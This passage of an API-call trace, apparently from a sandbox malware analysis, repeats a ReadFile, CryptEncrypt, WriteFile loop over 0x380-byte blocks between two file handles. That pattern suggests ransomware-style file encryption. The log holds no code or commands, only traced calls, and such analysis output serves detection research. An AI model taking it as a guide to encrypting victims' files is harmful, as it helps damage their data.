nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.476] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.476] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.477] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.477] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.477] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.477] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.477] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.477] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.477] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.477] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.477] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.477] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.477] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.477] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.477] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.477] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.477] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.477] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.477] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.478] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.478] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.478] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.478] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.478] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.478] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.478] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.478] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.478] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.478] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.478] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.478] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.478] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.478] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.478] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.478] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.479] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.479] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.479] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.479] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.479] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.479] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.479] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.479] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.479] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.479] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.479] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.479] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.479] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.479] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.479] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.479] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.480] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.480] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.480] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.480] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.480] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.480] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.480] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.480] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.480] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.480] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.480] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.480] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.480] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.480] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.480] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.480] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.480] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.480] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.481] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.481] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.481] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.481] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.481] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.481] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.481] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.481] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.481] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.481] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.481] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.481] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.481] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.481] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.482] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.482] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.482] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.482] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.482] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.482] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.482] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.482] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.482] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.482] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.482] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.482] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.482] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.482] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.482] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.482] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.482] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.482] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.483] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.483] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 